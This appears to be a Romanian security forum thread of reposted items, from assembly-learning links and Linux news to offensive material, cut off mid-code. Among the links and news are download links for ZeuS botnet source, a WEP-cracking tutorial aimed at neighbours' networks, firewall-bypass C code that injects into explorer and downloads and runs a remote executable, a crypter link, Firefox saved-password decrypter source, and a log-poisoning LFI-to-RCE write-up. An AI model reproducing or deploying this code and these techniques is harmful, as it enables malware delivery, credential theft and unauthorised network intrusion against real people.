Nytro

Assembley lanugage for Penetration Testers Assembley lanugage for Penetration tester Below are the useful resources to learn Assembley Language for pentesters to start learning Exploit writing Assembly - SkullSecurity Linux Assembley Linux Assembly Programming From the Ground Up Index of /releases/pgubook Iczelion’s Win32 Assembly Homepage Iczelion's Win32 Assembly Homepage Art of Assembly Art of Assembly Language Programming and HLA by Randall Hyde first 5 chapters is enough Intel Developer Manuals Intel® 64 and IA-32 Architectures Software Developer's Manuals Assembly Language Primer for Hackers Videos Assembly Primer for Hackers (Part 1) System Organization Assembly Primer For Hackers (Part 1) System Organization Assembly Primer for Hackers (Part 2) Virtual Memory Organization Assembly Primer For Hackers (Part 2) Virtual Memory Organization Assembly Primer for Hackers (Part 3) GDB Usage Primer Assembly Primer For Hackers (Part 3) Gdb Usage Primer Assembly Primer for Hackers (Part 4) Hello World Assembly Primer For Hackers (Part 4) Hello World Assembly Primer for Hackers (Part 5) Data Types Assembly Primer For Hackers (Part 5) Data Types Assembly Primer for Hackers (Part 6) Moving Data Assembly Primer For Hackers (Part 6) Moving Data Assembly Primer for Hackers (Part 7) Working with Strings Assembly Primer For Hackers (Part 7) Working With Strings Assembly Primer For Hackers (Part 8) Unconditional Branching Assembly Primer for Hackers (Part 9) Conditional Branching Assembly Primer For Hackers (Part 9) Conditional Branching Assembly Primer for Hackers (Part 10) Functions Assembly Primer For Hackers (Part 10) Functions Assembly Primer for Hackers (Part 11) Functions Stack Assembly Primer For Hackers (Part 11) Functions Stack Sursa: Assembley Language | Life of a Penetration Tester

Sa decripteze sau sa crack-uiasca hash-uri ca md5?

Eu o sa ajung pe la 8.

Se incearca gasirea autorului in functie de modul in care acesta scrie codul. Se pare ca e profesionist, desigur... http://www.thehackernews.com/2011/05/fingerprinting-author-of-zeus-botnet.html

Niciuna. Sunt prezentate niste extensii ale compilatorului GCC care fac viata mai usoara. Citeste macar o parte din articol. De exemplu sa definesti "1 ... 10" care sa reprezinte orice numar de la 1 la 10. Asta nu se poate in Visual C++ de exemplu si NU face parte din standardul C!

nytro@rst:~$ ls -la /var/log/auth.log -rw-r--r-- 1 syslog adm 1516 2011-05-12 17:20 /var/log/auth.log Vad ca e "citibil" de catre oricine...

GCC hacks in the Linux kernel Discover GCC extensions for the C language Skill Level: Intermediate M. Tim Jones Consultant Engineer Emulex Corp 18 Nov 2008 The Linux® kernel uses several special capabilities of the GNU Compiler Collection (GCC) suite. These capabilities range from giving you shortcuts and simplifications to providing the compiler with hints for optimization. Discover some of these special GCC features and learn how to use them in the Linux kernel. GCC and Linux are a great pair. Although they are independent pieces of software, Linux is totally dependent on GCC to enable it on new architectures. Linux further exploits features in GCC, called extensions, for greater functionality and optimization. This article explores many of these important extensions and shows you how they're used within the Linux kernel. GCC in its current stable version (version 4.3.2) supports three versions of the C standard: • The original International Organization for Standardization (ISO) standard of the C language (ISO C89 or C90) • ISO C90 with amendment 1 • The current ISO C99 (the default standard that GCC uses and that this article assumes) Note: This article assumes that you are using the ISO C99 standard. If you specify a standard older than the ISO C99 version, some of the extensions described in this article may be disabled. To specify the actual standard that GCC uses, you can use the -std option from the command line. Use the GCC manual to verify which extensions are supported in which versions of the standard (see Resources for a link). Applicable versions This article focuses on the use of GCC extensions in the 2.6.27.1 Linux kernel and version 4.3.2 of GCC. Each C extension refers to the file in the Linux kernel source where the example can be found. The available C extensions can be classified in several ways. This article puts them in two broad categories: • Functionality extensions bring new capabilities from GCC. • Optimization extensions help you generate more efficient code. Download: http://download.boulder.ibm.com/ibmdl/pub/software/dw/linux/l-gcc-hacks/l-gcc-hacks-pdf.pdf Online: http://www.ibm.com/developerworks/linux/library/l-gcc-hacks/index.html

Slackware 13.37 It's true! Slackware 13.37 has been released. Nearly a year in the making, you will appreciate the performance and stability that can only come with careful and rigorous testing. Slackware 13.37 uses the 2.6.37.6 Linux kernel (hence our new $SLACKWARE_VERSION.$KERNEL_VERSION naming system used for this release ;-), and also ships with 2.6.38.4 kernels for those who want to run the latest (and also includes configuration files for 2.6.35.12 and 2.6.39-rc4). The long-awaited Firefox 4.0 web browser is included, the X Window System has been upgraded (and includes the open source nouveau driver for nVidia cards). The venerable Slackware installer has been improved as well, with support for installing to btrfs (for those who would like to try a new copy on write filesystem), a one-package-per-line display mode option, and alienBOB's big surprise: an easy to set up PXE install server that runs right off the DVD! More details may by found in the official announcement and in the release notes. For a complete list of included packages, see the package list. Please consider supporting the Slackware project by picking up a copy of the Slackware 13.37 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. And, we still have T-shirts (coming soon, a limited edition 13.37 release commemorative black T-shirt with the classic Slackware logo on the front, and a "leet" LILO bootscreen on the back) and other Slackware stuff there, so have a look around. Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks are again due to the Slackware crew, the developers of slackbuilds.org, the community on linuxquestions.org, Slackware IRC channels, and everyone else who helped out with this release. Have fun, and enjoy the new stable release! Pat and the Slackware crew Oh, in case our web server that's rather short of RAM goes down, try this link: 1337 Error +--------------------------+ Slackware 13.37 for ARM is also available. For details, see: start [slackware ARM] Sursa: The Slackware Linux Project

Introduction to Network Security Toolkit (NST) The Network Security Toolkit (NST) is a ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live are: Ntop, wireshark, nmap with the vizualization tool ZenMap and kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the vizualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop following the links, for Nmap you got also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. On NST are also available Nagios and Argus, 2 software that can be used for network monitoring, you can check the status of various services, like web server, pop/imap mails erver or other services that in general you can test directly with a network connection. Another feature nice, and really “scenic” is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST use a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tools it’s present of the official wiki Conclusions This live CD it’s really filled with security tools and utility, so it could be really useful to set up in few minutes a location where you can do a security audit of a network or some hosts. It’s also really interesting the option to put it on a virtual machine, on the wiki there is a good how to on how to put NST on Virtualbox. So in few words: try and use it for your security audit, you’ll be satisfied for sure. Link: http://sourceforge.net/projects/nst/ Sursa (+video): » Linuxaria Introduction to Network Security Toolkit (NST)

Practical Android Attacks Bas Alberts + Massimiliano Oldani Immunity Inc. Attack Surface ? Remote: gain access ? Browser – WebKit ? Phone – Telephony stack ? Local: elevate privileges ? Kernel – Device drivers ? Userland – Zygote, ADBd, udev, etc Download: https://www.immunityinc.com/infiltrate/presentations/Android_Attacks.odt.pdf

Local File Inclusion to Remote Command Execution using SSH May 9th, 2011 at 21:15 by lanmaster53 Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs. I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result. I was shocked to find that auth.log was world readable. By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following: One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times. The injected command will run 3 times unless php execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt. Here is what the final product looked like with the addition of a pre-format tag for aesthetics. Sursa: Local File Inclusion to Remote Command Execution using SSH « LaNMaSteR53.blog Simplu si eficient

NoVirusThanks File Governor Easily unlock locked files and folders. File Governor is an advanced program which allows for files and folders within the system to be unlocked so that normal file I/O operations can be completed when normally they would not be able to be due to operating system restrictions for files currently in use. Once a file or folder is unlocked you will be able to force-close the file’s handle, rename, delete etc. File Governor is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 Screenshots Features Compatible with 32 & 64 bit OS Copy File to a User-Specified Directory Explorer Context Menu No Kernel Driver Needed Rename File to a User-Specified Filename Search for Locked Files Terminate Processes Unload DLL Unlock ALL Locked Files Unlock Single File Very user-friendly GUI Download: http://downloads.novirusthanks.org/files/filegovernor_setup.exe Portable: http://downloads.novirusthanks.org/files/portables/filegovernor_portable.zip Sursa: NoVirusThanks File Governor - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks

Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! Download: http://krash.in/real2/zeus.rar http://www.multiupload.com/P8QUNF4YJN Password: zeus Sursa: Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! ~ THN : The Hackers News Alternativ: http://www.megaupload.com/?d=LTJR7DHO https://rapidshare.com/files/461898687/ZeuS_2.0.8.9.zip http://uploading.com/files/626ff4fc/ZeuS%2B2.0.8.9.zip/

Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf

Two Zero Day Flaws Used To Bypass Google Chrome Security May 10, 2011 | 02:02 PM By Kelly Jackson Higgins Dark Reading French researchers say they hacked their way out of browser's sandbox, bypassed DES and ASLR Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN—which withheld technical details of the bugs in its disclosure--had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers. "We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN. A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said. Chrome's sandbox features, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack. Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox." The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar. Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data. VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine. Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox." Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen." And the hack highlights just how the sandbox—albeit an extra layer of security—is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says. Invincea's Ghosh says he expects the vulnerabilities to be exploited -- initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says. Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks. Sursa: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html

Am uitat sa precizez sursa, am actualizat primul post.

How To Crack WEP using Backtrack w/Pictures Author: Warlock This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it. Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi. What you need: Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around) Which you can get here; Downloads A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine) Patience Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd. First of all, before you do anything, navigate to the wireless assistant; Start>Internet>Wireless Assistant If you do not see any networks, then this will not work for you. Open the konsole, which is here; Now type, airmon-ng It should show you your wireless card's info, like so; Now type airmon-ng stop (your interface) Should show you this; Now type ifconfig (your interface) down Then type macchanger --mac 00:11:22:33:44:55 (your interface) This spoofs your mac address, so your victim cannot figure out who you are. Type airodump-ng (your interface) This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (This will stop your wirless card from searching for new networks) Open a new konsole Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface) Like so; It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.) Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup. Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface) Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface) Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C Now type aircrack-ng -b (bssid) (filename-01.cap) You have found the WEP key, mine being 77838557744334834238286364 (without the colons) And you're done! ~Warlock Sursa: LeetCoders

FWB++ FWB++ example by r3l4x[] (FWB stands for Firewall Bypass) /* Coder:Anskya,r3l4x[] */ #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200") #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO") #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text") #pragma comment(lib, "urlmon.lib") #include <windows.h> unsigned long inject (void *) { URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0); WinExec("C:\\xx.exe", SW_SHOW); ExitThread(0); return 0; } void Entrypoint() { DWORD Size; PBYTE module; HANDLE process; DWORD PID; LPVOID NewModule; module = (PBYTE)GetModuleHandle(0); Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage; GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID); process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); VirtualFreeEx(process, module, 0, MEM_RELEASE); NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(process, NewModule, module, Size, NULL) CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL); } Sursa: LeetCoders

Morphine Packer (C++ version) Author: holyfather This is a C/asm port to the original delphi code. Download: http://www.megaupload.com/?d=PU3FCSNN Sursa: http://leetcoders.org/showthread.php?t=167

FF pass Decrypt Firefox Password Decrypter by KriPpLer //----------------------------------------------------------------------- //////////////////////////////////////////////////////////// // Description: Firefox Password Cache Decrypter // Versions: Firefox 1, 2, and 3 // Author: KriPpLer // Language: C // Released: 9/9/2008 // URL: http://www.krippler.com/ /////////////////////////////////////////////////////////// // Credit: http://securityxploded.com/ (FF 2 Source) // Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip //////////////////////////////////////////////////////////// //----------------------------------------------------------------------- #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #include <userenv.h> #pragma comment(lib,"userenv.lib") //----------------------------------------------------------------------- //Firefox internal SEC structures typedef enum SECItemType { siBuffer = 0, siClearDataBuffer = 1, siCipherDataBuffer = 2, siDERCertBuffer = 3, siEncodedCertBuffer = 4, siDERNameBuffer = 5, siEncodedNameBuffer = 6, siAsciiNameString = 7, siAsciiString = 8, siDEROID = 9, siUnsignedInteger = 10, siUTCTime = 11, siGeneralizedTime = 12 }; struct SECItem { SECItemType type; unsigned char *data; unsigned int len; }; typedef enum SECStatus { SECWouldBlock = -2, SECFailure = -1, SECSuccess = 0 }; //----------------------------------------------------------------------- //Removes gecko-sdk dependency #define PRBool int #define PRUint32 unsigned int #define PR_TRUE 1 #define PR_FALSE 0 //Mozilla library names #define NSS_LIBRARY_NAME "nss3.dll" #define PLC_LIBRARY_NAME "plc4.dll" #define NSPR_LIBRARY_NAME "nspr4.dll" #define SQLITE_LIBRARY_NAME "sqlite3.dll" #define MOZCRT_LIBRARY_NAME "mozcrt19.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define NSSU_LIBRARY_NAME "nssutil3.dll" #define PLDS_LIBRARY_NAME "plds4.dll" #define SOFTN_LIBRARY_NAME "softokn3.dll" #define LOADLIBRARY(x) LoadLibrary(x) #define GETPROCADDRESS GetProcAddress #define FREELIBRARY FreeLibrary //----------------------------------------------------------------------- const int buflen = 10240; static char readbuf[buflen+1]; static int last = 0; static int next = 0; typedef struct PK11SlotInfoStr PK11SlotInfo; // NSS Library functions typedef SECStatus (*NSS_Init) (const char *configdir); typedef SECStatus (*NSS_Shutdown) (void); typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void); typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot); typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw); typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx); typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx); // PLC Library functions typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest); // Function declarations.. void NSSUnload(); int InitFFLibs(char *firefoxPath); int InitializeNSSLibrary(char *profilePath, char *password); int CheckMasterPassword(char *password); int DirectoryExists( char *path ); void StrLwr(char *str); int OpenFile(char *filePath); void CloseFile(); int ReadLine(char *buffer, int size); char *GetFFProfilePath(); char *GetFFLibPath(); char *GetFFVersion(); char **Explode(char *StrIn,const char *Delimiter); char *Split(char *String,char Delimeter[],int Part); char *replace(char *str, const char *substr, const char *repstr); char ReadChar(); char Vers[_MAX_PATH] = ""; int version = 1; int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen); int Base64Decode(char *cryptData, char **decodeData, int *decodeLen); //----------------------------------------------------------------------- NSS_Init NSSInit = NULL; NSS_Shutdown NSSShutdown = NULL; PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL; PK11_CheckUserPassword PK11CheckUserPassword = NULL; PK11_FreeSlot PK11FreeSlot = NULL; PK11_Authenticate PK11Authenticate = NULL; PK11SDR_Decrypt PK11SDRDecrypt = NULL; PL_Base64Decode PLBase64Decode = NULL; int IsNSSInitialized = 0; HMODULE libnss = NULL; HMODULE libplc = NULL; HMODULE libtmp = NULL; FILE *signonFile = NULL; //----------------------------------------------------------------------- int OpenFile(char *filePath) { last = next = 0; signonFile = fopen(filePath, "r"); if( signonFile == NULL ) { return 0; //fail } return 1; } //----------------------------------------------------------------------- char ReadChar() { if (next >= last) { next = 0; last = fread(readbuf, 1, buflen, signonFile); if (last <= 0 ) { return 0; } } return (readbuf[next++]); } //----------------------------------------------------------------------- int ReadLine(char *buffer, int size) { unsigned int c; int strLength = 0, i=0; buffer[0] = 0; while(1) { c = ReadChar(); // eof reached if ( c == 0 ) // || feof(file) ) return 0; if (c == '\n') { buffer[strLength++] = 0; break; } if (c != '\r') { for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++) { if( strLength >= size ) { printf("\n Buffer is insufficient to store data"); return 0; } // Increase buffer capacity dynamically buffer[strLength++] = (char)c; c = c >> 8; } } } return 1; } //----------------------------------------------------------------------- //Misc functions int DirectoryExists( char *path ) { DWORD attr = GetFileAttributes(path); if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) ) { return 0; } return 1; } //----------------------------------------------------------------------- void StrLwr(char *str) { int n=strlen(str); for(int i=0; i<n; i++) { if( str[i] >=65 && str[i]<=90 ) str[i]+=32; } } //----------------------------------------------------------------------- //Loads specified firefox library with the given ffdir path as root HMODULE LoadLibrary(char *firefoxDir, char *libName) { char loadPath[4096]=""; strcpy(loadPath, firefoxDir); strcat(loadPath, "/"); strcat(loadPath, libName); libtmp = LOADLIBRARY(loadPath); if( !libtmp ) { return 0; //Failed to load library } return libtmp; } //----------------------------------------------------------------------- int InitFFLibs(char *FFDir) { libnss = libplc = NULL; //Load all required dll's if( FFDir != NULL ) { //Minor version check if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower { goto version2; } else { if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) ) { } } } } } } version2: if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) ) { if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) ) { if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) ) { libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME); if(libnss ) printf("\n\n Librarys loaded from master firefox path successfully"); } } } } } } // Now load from current path. if( !libnss ) { libnss =LOADLIBRARY(NSS_LIBRARY_NAME); libplc =LOADLIBRARY(PLC_LIBRARY_NAME); if( !libnss || !libplc ) { printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME); return 0; } } else { printf("\n Firefox Libraries loaded successfully"); } // Extract the required functions.... NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init"); NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown"); PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot"); PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot"); PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate"); PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt"); PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword"); if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) { printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME); NSSUnload(); return 0; } // Get the functions from PLC library PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode"); if( !PLBase64Decode ) { printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME); NSSUnload(); return 0; } else { printf("\n Firefox library initialized successfully"); } return 1; } //----------------------------------------------------------------------- int InitializeNSSLibrary(char *profilePath) { IsNSSInitialized = 0; // Initialize the NSS library if( (*NSSInit) (profilePath) != SECSuccess ) { printf("\n\n NSSLib Initialization failed"); NSSUnload(); return 0; } else { IsNSSInitialized = 1; printf("\n NSS library initiliazed successfully"); } return 1; } //----------------------------------------------------------------------- void NSSUnload() { if( IsNSSInitialized && (NSSShutdown != NULL) ) (*NSSShutdown)(); if( libnss != NULL ) FREELIBRARY(libnss); //Free nss library if( libplc != NULL ) FREELIBRARY(libplc); //Free plc library } //----------------------------------------------------------------------- int DecryptStr(char *cryptData, char **clearData) { int decodeLen = 0; int finalLen = 0; char *decodeData = NULL; char *finalData = NULL; if( cryptData[0] != NULL ) { if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) ) { return 0; } // Do the actual PK11 decryption if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) { return 0; } *clearData = (char*) malloc( finalLen + 1 ); if( *clearData == NULL ) { printf("\n Insufficient memory"); return 0; } memcpy(*clearData, finalData, finalLen); *(*clearData + finalLen) = 0; // Null terminate string return 1; } if( Base64Decode(cryptData, clearData, &decodeLen) == 0 ) { return 0; } return 1; } //----------------------------------------------------------------------- int Base64Decode(char *cryptData, char **decodeData, int *decodeLen) { int len = strlen( cryptData ); int adjust = 0; if (cryptData[len-1] == '=') { adjust++; if (cryptData[len-2] == '=') adjust++; } *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL); if( *decodeData == NULL ) { return 0; } *decodeLen = (len*3)/4 - adjust; return 1; } //----------------------------------------------------------------------- int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen) { PK11SlotInfo *slot = 0; SECStatus status; SECItem request; SECItem reply; // Find token with SDR key slot = (*PK11GetInternalKeySlot)(); if (!slot) { return 0; } // Decrypt the string request.data = (unsigned char *)decodeData; request.len = decodeLen; reply.data = 0; reply.len = 0; status = (*PK11SDRDecrypt)(&request, &reply, NULL); if (status != SECSuccess) { return 0; } *clearData = (char*)reply.data; *finalLen = reply.len; // Free the slot (*PK11FreeSlot)(slot); return 1; } //----------------------------------------------------------------------- int DumpCache(char *profilePath,char *signonFile) { char buffer[10240]; char sbuffer[10240]; char name[10240]; char *clearData = NULL; int bufferLength = 10240; int count = 0; int ret; if( profilePath == NULL || signonFile == NULL) { return 0; } strcpy(sbuffer,profilePath); strcat(sbuffer,"\\"); strcat(sbuffer,signonFile); if(OpenFile(sbuffer) == 0 ) // Open the signon file { printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile); return 0; } else { printf("\n\n ============================================================== "); printf("\n = %s = ",signonFile); printf("\n ============================================================== "); /*///////////////////////////////////////// Begin cache dump *////////////////////////////////////////// printf("\n\n ======================= Unmanaged URLS ======================= "); // Read out the unmanaged ("Never remember" URL list ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag while (ReadLine(buffer, bufferLength) != 0) { // End of unmanaged list if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#') break; printf("\n %s ", buffer); } printf("\n ======================== Managed URLS ========================\n"); // read the URL line while (ReadLine(buffer, bufferLength) != 0 ){ printf("\n URL: %s ", buffer); //Start looping through final singon*.txt file while (ReadLine(buffer, bufferLength) != 0 ) { if (buffer[0] == '.') { printf("\n ==============================================================\n"); break; // end of cache entry } //Check if its a password if (buffer[0] == '*') { strcpy(name,&buffer[1]); ret = ReadLine(buffer, bufferLength); } else { printf("\n"); strcpy(name, buffer); ret = ReadLine(buffer, bufferLength); } if( DecryptStr(buffer, &clearData) == 1 ) { printf("\n %s: %s ", name, clearData); clearData = NULL; } } } printf("\n\n ============================================================== "); printf("\n = END %s = ",signonFile); printf("\n ============================================================== \n"); return 1; } /*///////////////////////////////////////// End pcache dump *////////////////////////////////////////// } //----------------------------------------------------------------------- // Find firefox path / libraries char *GetFFLibPath() { char regSubKey[] = 